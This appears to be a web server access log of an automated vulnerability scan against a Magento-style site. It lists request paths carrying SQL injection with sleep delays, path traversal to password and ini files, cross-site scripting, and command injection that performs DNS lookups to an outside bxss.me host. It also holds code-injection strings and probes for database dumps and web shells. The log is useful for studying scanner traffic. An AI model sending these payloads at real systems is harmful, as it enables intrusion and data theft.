/&echo%20kezvyb$()\\%20rlhtyd\\nz^xyu||a%20%23'%20&echo%20kezvyb$()\\%20rlhtyd\\nz^xyu||a%20%23|\"%20&echo%20kezvyb$()\\%20rlhtyd\\nz^xyu||a%20%23/js/mage/adminhtml/image.js 1 -
/^(%23$!@%23$)(()))******/index.php/install/wizard/locale/ 1 https://104.36.149.61/
/104_database.tar.gz 1 -
/examples/jsp/%252e%252e/%252e%252e/manager/html/ 1 -
/acc/%2fxfs.bxss.me/prototype/validation.js 1 -
/)/skin/install/default/ 1 https://104.36.149.61/
/acc/skin/install/default/default/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/iestyles.css 1 https://104.36.149.61/
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/js/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/db.tgz 1 -
/acc/skin/1some_inexistent_file_with_long_name%00.jpg/default/default/css/boxes.css 1 https://104.36.149.61/
/acc\"%20AND%202*3*8=6*8%20AND%20\"vo0o\"=\"vo0o/skin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/response.write(9864369*9044517)/js/varien/form.js 1 -
/acc/'\"()&%25<acx><ScRiPt%20>fBHE(9180)<%2fScRiPt>/prototype/extended_debug.js 1 https://104.36.149.61/
/\"+response.write(9277672*9056875)+\"/js/prototype/windows/ 1 -
/include/fckeditor 2 -
/(nslookup%20hitsekaeblojoace46.bxss.me||perl%20-e%20\"gethostbyname('hitsekaeblojoace46.bxss.me')\")/js/mage/adminhtml/accordion.js 1 -
/104.36.149.61-dump.tar 1 -
/acc'%20AND%202*3*8=6*8%20AND%20'nDda'='nDda/skin/install/default/default/css/reset.css 1 https://104.36.149.61/
/$(nslookup%20hittgiuymrlmx2c270.bxss.me||perl%20-e%20\"gethostbyname('hittgiuymrlmx2c270.bxss.me')\")/js/mage/adminhtml/giftoptions/ 1 -
/acc/js/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/debug.js 1 -
/-1%20OR%203+269-269-1=0+0+0+1/skin/install/default/default/css/boxes.css 1 https://104.36.149.61/
/acc/skin<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/install/default/default/css/reset.css 1 -
/(nslookup%20hitxtjsyrrmjdab667.bxss.me||perl%20-e%20\"gethostbyname('hitxtjsyrrmjdab667.bxss.me')\")/index.php/install/ 1 -
/acc/1some_inexistent_file_with_long_name%00.jpg/mage/adminhtml/hash.js 1 https://104.36.149.61/
/acc/index.php//../../../../../../../../../../../../../../../..//etc/passwd 1 -
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/js/prototype/validation.js 1 https://104.36.149.61/
/acc/js/mage/bxss.me%2ft%2fxss.html%3f%2500/image.js 1 -
/acc/'\"()&%25<acx><ScRiPt%20>KwaQ(9842)<%2fScRiPt>/prototype/debug.js 1 https://104.36.149.61/
/acc/index.php/install/wizard//../../../../../../../../boot.ini 1 -
/..%2facc/js/prototype/windows/themes/ 1 https://104.36.149.61/
/'%3bprint(md5(31337))%3b$a='/js/prototype/windows/ 1 -
/acc/index.php/install///..//..//..//..//..//..//..//..//..//..//../etc/passwd 1 -
/104_dump.tgz 1 -
/acc/skin/install/default/default/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/ie7minus.css 1 https://104.36.149.61/
/9jj1lAY7/js/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/acc/js'\"()&%25<acx><ScRiPt%20>Thnf(9924)<%2fScRiPt>/mage/translate.js 1 https://104.36.149.61/
/crlqkslV/js/prototype/debug.js 1 https://104.36.149.61/
/${@print(md5(31337))}/skin/install/default/default/css/ie7minus.css 1 -
/bxss.me%2ft%2fxss.html%3f%2500/js/mage/adminhtml/giftoptions/ 1 -
/rockmongo/ 1 -
/theme/META-INF%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini 1 -
/'+response.write(9928247*9362652)+'/js/mage/adminhtml/uploader/ 1 -
/acc/js/bxss.me%2ft%2fxss.html%3f%2500/adminhtml/product/ 1 -
/database.sql 1 -
/acc/js/mage/%2fxfs.bxss.me/backup.js 1 -
/acc/skin'\"()&%25<acx><ScRiPt%20>Lssw(9827)<%2fScRiPt>/install/default/default/ 1 https://104.36.149.61/
/acc/skin/install/default/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/ 1 -
/${@print(md5(31337))}\\/js/prototype/extended_debug.js 1 -
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/effects.js 1 https://104.36.149.61/
/acc%25'%20AND%202*3*8=6*8%20AND%20'ZbqO'!='ZbqO%25/js/mage/adminhtml/image.js 1 https://104.36.149.61/
/acc/js/mage/'\"()&%25<acx><ScRiPt%20>yxiC(9679)<%2fScRiPt>/giftoptions/ 1 https://104.36.149.61/
/KOM2OGNI'%20OR%20148=(SELECT%20148%20FROM%20PG_SLEEP(15))--/js/prototype/tooltip.js 1 https://104.36.149.61/
/acc/js/mage/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/grid.js 1 https://104.36.149.61/
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/1%20waitfor%20delay%20'0:0:15'%20--%20/js/prototype/tooltip.js 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/js/varien/form.js 1 https://104.36.149.61/
/.%2facc/js/scriptaculous/effects.js 1 https://104.36.149.61/
/acc/index.php/install<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/wizard/config/ 1 -
/TZmxHomA/skin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/acc\"%20AND%202*3*8=6*8%20AND%20\"K9qR\"=\"K9qR/js/scriptaculous/effects.js 1 https://104.36.149.61/
/acc/js/prototype<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/tooltip_manager.js 1 -
/webtools/ 1 -
/${9999375+10000323}/js/mage/adminhtml/giftmessage.js 1 -
/^(%23$!@%23$)(()))******/js/prototype/tooltip.js 1 https://104.36.149.61/
/cgi-bin/php5-cgi 1 -
/${9999890+9999945}/js/mage/adminhtml/image.js 1 -
/|echo%20ahwunb$()\\%20eodquf\\nz^xyu||a%20%23'%20|echo%20ahwunb$()\\%20eodquf\\nz^xyu||a%20%23|\"%20|echo%20ahwunb$()\\%20eodquf\\nz^xyu||a%20%23/js/mage/adminhtml/giftoptions/ 1 -
/acc/index.php/install/wizard/locale//........................................................................../../../../../../../../etc/passwd 1 -
/acc\"%20AND%202*3*8=6*8%20AND%20\"bAGY\"=\"bAGY/skin/adminhtml/ 1 https://104.36.149.61/
/acc/index.php/install/1some_inexistent_file_with_long_name%00.jpg/config/ 1 https://104.36.149.61/
/acc/js/mage/adminhtml<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/grid.js 1 -
/acc/js/%3b(nslookup%20hitoudvyhkuqgc01b7.bxss.me||perl%20-e%20\"gethostbyname('hitoudvyhkuqgc01b7.bxss.me')\")|(nslookup%20hitoudvyhkuqgc01b7.bxss.me||perl%20-e%20\"gethostbyname('hitoudvyhkuqgc01b7.bxss.me')\")&(nslookup%20hitoudvyhkuqgc01b7.bxss.me||per 1 -
/acc/skin/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/default/default/css/reset.css 1 https://104.36.149.61/
/acc/js'\"()&%25<acx><ScRiPt%20>kUNn(9274)<%2fScRiPt>/mage/adminhtml/sales/ 1 https://104.36.149.61/
/.%2facc/js/mage/translate.js 1 https://104.36.149.61/
/acc/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/mage/adminhtml/ 1 https://104.36.149.61/
/remote/fgt_lang 8 -
/${@print(md5(31337))}\\/skin/install/default/default/css/clears.css 1 -
/(nslookup%20hitlpfwtlxtxx6f5a8.bxss.me||perl%20-e%20\"gethostbyname('hitlpfwtlxtxx6f5a8.bxss.me')\")/js/mage/adminhtml/flexuploader.js 1 -
/34YMZmRA'%3b%20waitfor%20delay%20'0:0:15'%20--%20/js/mage/translate.js 1 https://104.36.149.61/
/-1%20OR%203+378-378-1=0+0+0+1/js/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/acc/skin/adminhtml/12345'\"\\'\\\") 1 https://104.36.149.61/
/'%3bprint(md5(31337))%3b$a='/js/prototype/prototype.js 1 -
/acc/js/mage/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/giftoptions/ 1 https://104.36.149.61/
/(nslookup%20hitzehevsrrtqd6b9a.bxss.me||perl%20-e%20\"gethostbyname('hitzehevsrrtqd6b9a.bxss.me')\")/skin/install/default/default/css/iestyles.css 1 -
/../../../../../Gemfile 1 -
/editor/FCKeditor 2 -
/echo%20ywbhwy$()\\%20wpgcho\\nz^xyu||a%20%23'%20&echo%20ywbhwy$()\\%20wpgcho\\nz^xyu||a%20%23|\"%20&echo%20ywbhwy$()\\%20wpgcho\\nz^xyu||a%20%23/js/mage/adminhtml/backup.js 1 -
/\".gethostbyname(lc(\"hitbm\".\"ykmkgumx22159.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(121).chr(78).chr(97).chr(74).\"/index.php/install/wizard/locale/ 1 -
/cgi-bin/GruntFile.coffee 1 -
/..%2facc/index.php/install/wizard/config/ 1 https://104.36.149.61/
/phpinfo.php5 1 -
/acc/skin/adminhtml/'\"()&%25<acx><ScRiPt%20>gumy(9103)<%2fScRiPt>/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/config/../../../../../package-lock.json 1 -
/cms/plugins/content/jthumbs/includes/phpThumb.php 1 -
/backup_104.7z 1 -
/reports/rwservlet/showenv 1 -
/acc/index.php/../../../../web.config 1 -
/Http://bxss.me/t/fit.txt/skin/install/default/default/css/reset.css 1 https://104.36.149.61/
/104_dump.tar.gz 1 -
/acc/%3b(nslookup%20hitwjipiaoczv2681b.bxss.me||perl%20-e%20\"gethostbyname('hitwjipiaoczv2681b.bxss.me')\")|(nslookup%20hitwjipiaoczv2681b.bxss.me||perl%20-e%20\"gethostbyname('hitwjipiaoczv2681b.bxss.me')\")&(nslookup%20hitwjipiaoczv2681b.bxss.me||perl%2 1 -
/acc/.%2fjs/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/prototype/ 1 https://104.36.149.61/
/acc/'\"()&%25<acx><ScRiPt%20>IUUR(9145)<%2fScRiPt>/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/translate.js 1 https://104.36.149.61/
/acc/skin/install/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/default/css/iestyles.css 1 https://104.36.149.61/
/jquery-file-upload/server/php/ 1 -
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/js/mage/translate.js 1 https://104.36.149.61/
/&(nslookup%20hitvkystxrkzb978a2.bxss.me||perl%20-e%20\"gethostbyname('hitvkystxrkzb978a2.bxss.me')\")&'\\\"`0&(nslookup%20hitvkystxrkzb978a2.bxss.me||perl%20-e%20\"gethostbyname('hitvkystxrkzb978a2.bxss.me')\")&`'/js/mage/adminhtml/backup.js 1 -
/db.rar 1 -
/acc/bxss.me%2ft%2fxss.html%3f%2500/install/default/default/css/boxes.css 1 -
/acc/js/..%2fmage/ 1 https://104.36.149.61/
/-1%20OR%202+929-929-1=0+0+0+1/js/mage/adminhtml/events.js 1 https://104.36.149.61/
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/adminhtml/ 1 https://104.36.149.61/
/<!--/js/mage/adminhtml/grid.js 1 -
/acc/skin/'\"()&%25<acx><ScRiPt%20>PQf4(9455)<%2fScRiPt>/ 1 https://104.36.149.61/
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/js/prototype/ 1 -
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/js/prototype/prototype.js 1 -
/104.36.149.61_db.zip 1 -
/-1%20OR%202+234-234-1=0+0+0+1/js/prototype/ 1 https://104.36.149.61/
/jvyr0ehozmbg 1 https://104.36.149.61/
/acc/js/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/adminhtml/sales/ 1 https://104.36.149.61/
/acc/js/mage<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/adminhtml/accordion.js 1 -
/-1%20OR%203+929-929-1=0+0+0+1/js/mage/adminhtml/events.js 1 https://104.36.149.61/
/acc/'\"()&%25<acx><ScRiPt%20>Ijhk(9388)<%2fScRiPt>/install/default/default/css/boxes.css 1 https://104.36.149.61/
/acc/js/mage/adminhtml/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/ 1 https://104.36.149.61/
/'.print(md5(31337)).'/js/prototype/tooltip.js 1 -
/%3b(nslookup%20hitcaxznbtggk0ba3d.bxss.me||perl%20-e%20\"gethostbyname('hitcaxznbtggk0ba3d.bxss.me')\")|(nslookup%20hitcaxznbtggk0ba3d.bxss.me||perl%20-e%20\"gethostbyname('hitcaxznbtggk0ba3d.bxss.me')\")&(nslookup%20hitcaxznbtggk0ba3d.bxss.me||perl%20-e% 1 -
/acc/js/mage/adminhtml/tabs.js/920727%40 1 https://104.36.149.61/
/&(nslookup%20hitgosegmsuocfb4a9.bxss.me||perl%20-e%20\"gethostbyname('hitgosegmsuocfb4a9.bxss.me')\")&'\\\"`0&(nslookup%20hitgosegmsuocfb4a9.bxss.me||perl%20-e%20\"gethostbyname('hitgosegmsuocfb4a9.bxss.me')\")&`'/index.php/install/wizard/config/ 1 -
/acc/js/mage/adminhtml/giftoptions'\"()&%25<acx><ScRiPt%20>yxiC(9789)<%2fScRiPt>/ 1 https://104.36.149.61/
/%2fxfs.bxss.me/skin/install/default/default/css/reset.css 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/skin/adminhtml/ 1 https://104.36.149.61/
/acc/..%2fskin/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/'+response.write(9322062*9635078)+'/js/prototype/ 1 -
/acc/js/prototype/tooltip.js/961999%40 1 https://104.36.149.61/
/acc/skin/install/default/default/%2fxfs.bxss.me/ie7minus.css 1 -
/(nslookup%20hitmevoeqjnwvf140c.bxss.me||perl%20-e%20\"gethostbyname('hitmevoeqjnwvf140c.bxss.me')\")/js/mage/adminhtml/giftoptions/ 1 -
/${@print(md5(31337))}\\/js/mage/adminhtml/grid.js 1 -
/acc/index.php/install/wizard/locale//%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/passwd 1 -
/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php 1 -
/acc/'\"()&%25<acx><ScRiPt%20>sjVf(9969)<%2fScRiPt>/prototype/windows/themes/ 1 https://104.36.149.61/
/acc/skin/install'\"()&%25<acx><ScRiPt%20>eCQQ(9117)<%2fScRiPt>/default/default/css/clears.css 1 https://104.36.149.61/
/acc/js/mage/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/sales/ 1 https://104.36.149.61/
/Http://bxss.me/t/fit.txt/js/prototype/tooltip_manager.js 1 https://104.36.149.61/
/(nslookup%20hitjblihldbut5ff37.bxss.me||perl%20-e%20\"gethostbyname('hitjblihldbut5ff37.bxss.me')\")/js/scriptaculous/effects.js 1 -
/-1%20OR%202+252-252-1=0+0+0+1/skin/frontend/ 1 https://104.36.149.61/
/acc/skin/install/'\"()&%25<acx><ScRiPt%20>PjTl(9577)<%2fScRiPt>/ 1 https://104.36.149.61/
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/js/varien/js.js 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2fpackage-lock.json 1 -
/acc/index.php/install/wizard/config/../../../../../Gemfile 1 -
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/js/prototype/windows/ 1 https://104.36.149.61/
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/js/mage/ 1 -
/servlet/%0ARefresh:0 1 -
/acc/..%2fskin/install/default/default/css/clears.css 1 https://104.36.149.61/
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/skin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/acc/js/mage/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/form.js 1 https://104.36.149.61/
/acc/js<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/mage/adminhtml/flexuploader.js 1 -
/acc/js/mage/adminhtml<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/giftoptions/ 1 -
/`(nslookup%20hitqnefupbsvp39725.bxss.me||perl%20-e%20\"gethostbyname('hitqnefupbsvp39725.bxss.me')\")`/skin/install/default/default/ 1 -
/adminer-4.5.0-mysql.php 1 https://104.36.149.61/
/acc/index.php//../../../../../../../../windows/win.ini 2 -
/`(nslookup%20hitqidnmgybtf67730.bxss.me||perl%20-e%20\"gethostbyname('hitqidnmgybtf67730.bxss.me')\")`/index.php/install/wizard/config/ 1 -
/iXJR 1 -
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/js/mage/adminhtml/hash.js 1 https://104.36.149.61/
/acc/skin/adminhtml/.%2fdefault/ 1 https://104.36.149.61/
/)/js/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/..%2facc/js/prototype/windows/ 1 https://104.36.149.61/
/acc/js/mage/adminhtml/'\"()&%25<acx><ScRiPt%20>yxiC(9679)<%2fScRiPt>/ 1 https://104.36.149.61/
/casa/nodes/thumbprints 1 -
/tmui/login.jsp/.. 1 -
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/js/mage/adminhtml/form.js 1 https://104.36.149.61/
/1%00%c0%a7%c0%a2%252527%252522/js/mage/adminhtml/browser.js 1 https://104.36.149.61/
/${@print(md5(31337))}\\/js/mage/adminhtml/giftmessage.js 1 -
/acc/js/1%00%c0%a7%c0%a2%252527%252522/adminhtml/giftmessage.js 1 https://104.36.149.61/
/acc/js/mage/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/flexuploader.js 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/js/mage/adminhtml/image.js 1 https://104.36.149.61/
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/js/mage/adminhtml/browser.js 1 https://104.36.149.61/
/acc/js/mage/.%2fadminhtml/grid.js 1 https://104.36.149.61/
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/mage/adminhtml/form.js 1 -
/..%2f..%2f..%2fpackage.json 1 -
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/js/mage/adminhtml/product/ 1 https://104.36.149.61/
/'%3bprint(md5(31337))%3b$a='/skin/install/default/default/css/iestyles.css 1 -
/response.write(9954991*9023959)/js/mage/adminhtml/sales/ 1 -
/authenticationendpoint/pri.jsp 1 -
/104db.sql.tar 1 -
/4P95OPJX/js/prototype/tooltip_manager.js 1 https://104.36.149.61/
/acc/js/varien/bxss.me%2ft%2fxss.html%3f%2500.js 1 -
/acc/skin/'\"()&%25<acx><ScRiPt%20>xIbD(9893)<%2fScRiPt>/default/default/css/reset.css 1 https://104.36.149.61/
/acc/index.php/install//../../WEB-INF/web.xml%00.jsp 1 -
/acc/bxss.me%2ft%2fxss.html%3f%2500/mage/adminhtml/giftmessage.js 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/install/wizard/config/ 1 https://104.36.149.61/
/acc/.%2fjs/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/acc/index.php/install/wizard//%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/passwd 1 -
/\".gethostbyname(lc(\"hitzx\".\"lnwszvrv63ed0.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(98).chr(74).chr(115).chr(87).\"/js/prototype/ 1 -
/acc'||'/js/varien/js.js 1 https://104.36.149.61/
/cgi-bin/.histfile 1 -
/acc/js/mage/1some_inexistent_file_with_long_name%00.jpg/form.js 1 https://104.36.149.61/
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/skin/install/default/default/css/clears.css 1 https://104.36.149.61/
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/prototype/debug.js 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/js/prototype/windows/ 1 https://104.36.149.61/
/wps/wcm/connect/'+or+'XX4Zz'='XX4Zz 1 -
/acc/js/prototype<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/windows/themes/ 1 -
/${@print(md5(31337))}/js/mage/ 1 -
/acc9077039/js/mage/adminhtml/backup.js 1 https://104.36.149.61/
/${@print(md5(31337))}/skin/frontend/ 1 -
/acc/js<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/mage/adminhtml/form.js 1 -
//%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\etc/passwd 1 -
/acc/.%2fjs/scriptaculous/effects.js 1 https://104.36.149.61/
/web_shell_cmd.gch 3 -
/\"+\"A\".concat(70-3).concat(22*4).concat(120).concat(67).concat(100).concat(77)+(require\"socket\"%0aSocket.gethostbyname(\"hitsr\"+\"mlcfzwia78b93.bxss.me.\")[3].to_s)+\"/js/prototype/validation.js 1 -
/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php 1 -
/acc/%3b(nslookup%20hitpfabulwjjc4a62d.bxss.me||perl%20-e%20\"gethostbyname('hitpfabulwjjc4a62d.bxss.me')\")|(nslookup%20hitpfabulwjjc4a62d.bxss.me||perl%20-e%20\"gethostbyname('hitpfabulwjjc4a62d.bxss.me')\")&(nslookup%20hitpfabulwjjc4a62d.bxss.me||perl%2 1 -
/if(now()=sysdate(),sleep(15),0)/index.php/install/wizard/config/ 1 https://104.36.149.61/
/temp.php 1 -
/acc/skin/install/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/default/css/iestyles.css 1 -
/acc/index.php/install/wizard/locale/..%2f..%2fpackage.json 1 -
/acc/js/mage<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/adminhtml/product/ 1 -
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/js/mage/translate.js 1 https://104.36.149.61/
/<!--/js/prototype/tooltip.js 1 -
/acc/skin/install/default/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/css/boxes.css 1 https://104.36.149.61/
/%3b(nslookup%20hitxklpvnvemb29ae4.bxss.me||perl%20-e%20\"gethostbyname('hitxklpvnvemb29ae4.bxss.me')\")|(nslookup%20hitxklpvnvemb29ae4.bxss.me||perl%20-e%20\"gethostbyname('hitxklpvnvemb29ae4.bxss.me')\")&(nslookup%20hitxklpvnvemb29ae4.bxss.me||perl%20-e% 1 -
/acc/skin'\"()&%25<acx><ScRiPt%20>PjTl(9594)<%2fScRiPt>/install/default/ 1 https://104.36.149.61/
/acc/skin/adminhtml/bxss.me%2ft%2fxss.html%3f%2500/ 1 -
/acc/js/varien/form<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>.js 1 -
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/js/mage/adminhtml/wysiwyg/ 1 -
/acc/js/mage/%3b(nslookup%20hitgsjzjkbobm43e3e.bxss.me||perl%20-e%20\"gethostbyname('hitgsjzjkbobm43e3e.bxss.me')\")|(nslookup%20hitgsjzjkbobm43e3e.bxss.me||perl%20-e%20\"gethostbyname('hitgsjzjkbobm43e3e.bxss.me')\")&(nslookup%20hitgsjzjkbobm43e3e.bxss.me 1 -
/acc/js/mage/1some_inexistent_file_with_long_name%00.jpg/ 1 https://104.36.149.61/
/m0qN 1 -
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/adminhtml/ 1 https://104.36.149.61/
/wp-json/buddypress/v1/signup 1 -
/acc/skin/install/default/default/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/ie7minus.css 1 https://104.36.149.61/
/acc/%3b(nslookup%20hitoxhtmnuqpyddd5a.bxss.me||perl%20-e%20\"gethostbyname('hitoxhtmnuqpyddd5a.bxss.me')\")|(nslookup%20hitoxhtmnuqpyddd5a.bxss.me||perl%20-e%20\"gethostbyname('hitoxhtmnuqpyddd5a.bxss.me')\")&(nslookup%20hitoxhtmnuqpyddd5a.bxss.me||perl%2 1 -
/^(%23$!@%23$)(()))******/js/mage/adminhtml/backup.js 1 https://104.36.149.61/
/-1%20OR%202+12-12-1=0+0+0+1/js/prototype/extended_debug.js 1 https://104.36.149.61/
/<!--/js/mage/adminhtml/browser.js 1 -
/acc/index.php/install/wizard/config/..%2fweb.config 1 -
/104.36.149.61-dump.tgz 1 -
/acc/index.php/install/wizard/config//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 2 -
/._env 1 -
/1phpqKlpO/skin/install/default/default/css/boxes.css 1 -
/\"+\"A\".concat(70-3).concat(22*4).concat(115).concat(71).concat(108).concat(67)+(require\"socket\"%0aSocket.gethostbyname(\"hitnz\"+\"xgnmxbwo1f401.bxss.me.\")[3].to_s)+\"/js/mage/translate.js 1 -
/authenticationendpoint/denver.jsp 1 -
/cgi-bin/FormMail.cgi 1 ()%20{%20Referer
/1%00%c0%a7%c0%a2%252527%252522/skin/install/default/default/css/reset.css 1 https://104.36.149.61/
/acc/index.php/install//../../../../../../../../windows/win.ini%C0%80.jsp 1 -
/acc'%20AND%202*3*8=6*8%20AND%20'Ye9L'='Ye9L/js/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
///....//....//....//....//....//....//....//....//etc//passwd 1 -
/'.print(md5(31337)).'/js/mage/adminhtml/events.js 1 -
/acc/js/mage/translate.js/956429%40 1 https://104.36.149.61/
/acc/js/mage/adminhtml/uploader/./WEB-INF/web.xml%00.jsp 2 -
/${10000162+9999579}/js/mage/adminhtml/events.js 1 -
/.%2facc/js/prototype/tooltip_manager.js 1 https://104.36.149.61/
/104-database.sql 1 -
/server/TCPIPGEN.htm 1 -
//%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c 1 -
/response.write(9975357*9127767)/skin/adminhtml/default/ 1 -
/bxss.me%2ft%2fxss.html%3f%2500/js/prototype/debug.js 1 -
/acc/js/1%00%c0%a7%c0%a2%252527%252522/adminhtml/form.js 1 https://104.36.149.61/
/7TWhYBF0'%20OR%20613=(SELECT%20613%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/product/ 1 https://104.36.149.61/
/catalog-portal/ui/oauth/verify 2 -
/1'\"/skin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
